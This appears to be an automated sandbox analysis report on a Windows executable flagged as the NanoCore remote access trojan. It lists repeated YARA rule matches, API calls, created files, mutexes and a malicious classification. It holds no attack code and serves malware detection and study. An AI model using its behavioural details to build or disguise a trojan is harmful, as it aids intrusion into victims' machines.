        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: classification engineClassification label: mal100.troj.evad.winEXE@8/7@6/2
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2A2D5 GetLastError,FormatMessageW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18713 AdjustTokenPrivileges,CloseHandle,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB10DA AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB10A3 AdjustTokenPrivileges,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23E91 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2BBA6 CoInitialize,CoCreateInstance,CoUninitialize,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\hdwwiz
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ebebb95b-836f-4d8b-92f1-dafac3cec9d8}
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
